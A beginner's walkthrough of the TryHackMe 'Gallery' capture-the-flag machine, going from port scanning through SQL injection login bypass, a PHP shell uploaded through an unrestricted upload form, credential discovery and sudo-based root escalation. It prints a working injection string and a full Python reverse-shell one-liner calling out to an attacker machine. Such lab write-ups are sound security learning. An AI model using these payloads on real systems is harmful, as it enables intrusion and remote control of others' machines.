📟THM Gallery

Hello guys, Gallery is nice beginner box that teaches about SQL injection, authentication bypass, insecure file upload and finally privilege escalation. Without much say let’s jump in.

Step 1 – Enumeration

We start with scan port and directory. This machine only open 2 port and lot of directory.

As can be seen from directory scanning, it have nothing to do on port 80 but port 8080 got bunch of directory and login page.

Step 2 – Authentication Bypass

Moving forward to login page, it show CMS Simple Image Gallery System. Looking forward in research, it appears to have SQL injection on login page. Let try manual method.

Manual

Using basic injection, we manage to get in

admin' or '1'='1'#

ExploitDB Method

Searching the CMS and it appear to have RCE without authentication. Download the poc and run it.

Step 3 – Reverse Shell

Manual

We manage to get access as admin to this website. From directory scanning before, found uploads file, let check this and try put our reverse shell.

Create new file

Upload testing file

Successfully upload text file. Which mean we can upload reverse shell here. No sanitation happens here, and it can lead to arbitrary file upload.

Listener

Go to upload directory and choose the last number. Click to php file and we get the shell.

ExploitDB

Giving the link, let follow and we manage to read the file. Let put reverse shell here. This time, im using python3.

which python3

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("MACHINE",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

Step 4 – MySQL Credential

Since we can’t read file inside Mike folder, let focus on credentials that might have in www directory.

Checking into initialize.php, we found credentials MySQL. Let connect into MySQL.

Unfortunately, this just a rabbit hole. Let proceed with linpeas.

Step 5 – User Access

After few second, we notice password on history, using the credentials we manage to access as mike.

Step 6 – Privilege Escalation

From linpeas result, we can notice one file on directory /opt. or checking on sudo permission, we can escalate root by rootkit.sh.

Let check what this bash file doing and in what method we can exploit it.

From this script, we can read report.txt in root directory. Using nano to escalate it. Let find in gtfobin and exploit this.

We manage to get root. Easy right? What do you think?

Learning

1. CMS Simple Image Gallery System

2. Nano escalation

3. Unintended pwnkit exploit.